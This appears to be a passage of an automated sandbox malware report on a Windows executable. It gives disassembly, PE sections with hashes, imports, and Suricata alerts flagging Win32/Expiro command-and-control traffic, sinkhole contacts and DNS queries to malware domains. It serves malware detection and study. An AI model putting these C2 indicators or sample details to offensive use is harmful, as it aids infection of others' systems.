                                                                                                                                                                                                                                                                                                                                                    mov ecx, dword ptr [00469A7Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    mov edx, dword ptr [0045CA58h]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067105h
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067179h
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE90180F0h
                                                                                                                                                                                                                                                                                                                                                    lea eax, dword ptr [eax+00h]
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0000x25ba.idata
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000xbae00.rsrc
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x67c8.reloc
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x720000x18.rdata
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x6e70c0x5e0.idata
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                    .text0x10000x5c0800x5c200ef9f6beac02a22c14de0580f88f1afcfFalse0.522202552578019data6.522155536157196IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                    .itext0x5e0000x79c0x800379e45a43a773355cc28b84791b9a13eFalse0.60302734375data6.058068981530265IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                    .data0x5f0000xab180xac0049a3c371488ab4e03e4acff1c3710f0aFalse0.08146348110465117data5.80716710843227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                    .bss0x6a0000x36c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                    .idata0x6e0000x25ba0x2600b427f673ebec4fc783ee1f0f21514034False0.3234991776315789data5.220230392791352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                    .tls0x710000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                    .rdata0x720000x180x200abe671229d70eaf9fcf89a57bca9cee6False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "G"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                    .reloc0x730000x67c80x680053a21ee01ba4a4a1d20690e3b048aee4False0.6426532451923077data6.684698004911764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                    .rsrc0x7a0000xbae000xbae0047207f56b0f6a5655797a272ae87d231False0.503993781354515data7.490536162426885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7aac40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7abf80x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7ad2c0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7ae600x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7af940x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7b0c80x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                                                                                                                                                    RT_CURSOR0x7b1fc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7b3300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7b5000x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7b6e40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7b8b40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7ba840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7bc540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7be240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7bff40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7c1c40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7c3940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x7c5640xb397cDevice independent bitmap graphic, 798 x 307 x 24, image size 735572, resolution 3780 x 3780 px/mEnglishUnited States0.5120430335557332
                                                                                                                                                                                                                                                                                                                                                    RT_BITMAP0x12fee00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                                                                                                                                                                                                                    RT_ICON0x12ffc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 15118 x 15118 px/m0.11639004149377594
                                                                                                                                                                                                                                                                                                                                                    RT_DIALOG0x1325700x52data0.7682926829268293
                                                                                                                                                                                                                                                                                                                                                    RT_DIALOG0x1325c40x52data0.7560975609756098
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1326180x34data0.5
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x13264c0x2b0data0.4752906976744186
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1328fc0xb8data0.6793478260869565
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1329b40xecdata0.6398305084745762
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x132aa00x2f0data0.4587765957446808
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x132d900x3d0data0.38729508196721313
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1331600x370data0.4022727272727273
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1334d00x3ccdata0.33539094650205764
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x13389c0x214data0.49624060150375937
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x133ab00xccdata0.6274509803921569
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x133b7c0x194data0.5643564356435643
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x133d100x3c4data0.3288381742738589
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x1340d40x338data0.42961165048543687
                                                                                                                                                                                                                                                                                                                                                    RT_STRING0x13440c0x294data0.42424242424242425
                                                                                                                                                                                                                                                                                                                                                    RT_RCDATA0x1346a00x10data1.5
                                                                                                                                                                                                                                                                                                                                                    RT_RCDATA0x1346b00x320data0.68625
                                                                                                                                                                                                                                                                                                                                                    RT_RCDATA0x1349d00x1e5Delphi compiled form 'TForm1'0.6969072164948453
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134bb80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134bcc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134be00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134bf40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134c080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134c1c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x134c300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x134c440x14data1.25

                                                                                                                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                                                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                                                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                                                                                                                                                    user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                                                                                                                                                                                    kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                                                                                                                                                                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                                                                                                                                                                                    user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIconFromResourceEx, CreateIcon, CopyIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                                                                                                                                                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                                                                                                                                                                                                                                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                                                                                                                                                                                    kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExW, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, IsBadStringPtrA, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumResourceNamesA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                                                                                                                                                                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                                                                                                                                                                                                                    kernel32.dllSleep
                                                                                                                                                                                                                                                                                                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                                                                                                                                    comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                                                                    shell32.dllExtractIconA

                                                                                                                                                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:12.573946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049708198.252.105.91443TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:28.611072+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.1049744TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:28.611072+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.1049744TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:31.363417+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.104975354.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:32.627342+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.1049757TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:32.627342+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.1049757TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:37.384307+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10540941.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:37.495356+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.1049773TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:37.495356+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.1049773TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:40.975891+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10559741.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:41.335413+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10550121.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:12:47.189936+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10529031.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:13:07.874186+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10544981.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:13:10.876049+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10642551.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:13:32.576759+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.104986782.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:33.633509+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105001218.141.10.10780TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:39.886220+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.1050015TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:39.886220+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.1050015TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:41.732453+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.1050017TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:41.732453+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.1050017TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:42.324768+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.1050016TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:42.324768+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.1050016TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:44.673882+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.1050018TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:44.673882+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.1050018TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:53.634411+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.1050029TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:53.634411+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.1050029TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:55.447711+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.1050031TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:14:55.447711+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.1050031TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:39.005596+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105007718.246.231.12080TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:39.125752+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.1050077TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:39.125752+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.1050077TCP
                                                                                                                                                                                                                                                                                                                                                    2024-11-26T08:15:41.242825+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.1050078TCP
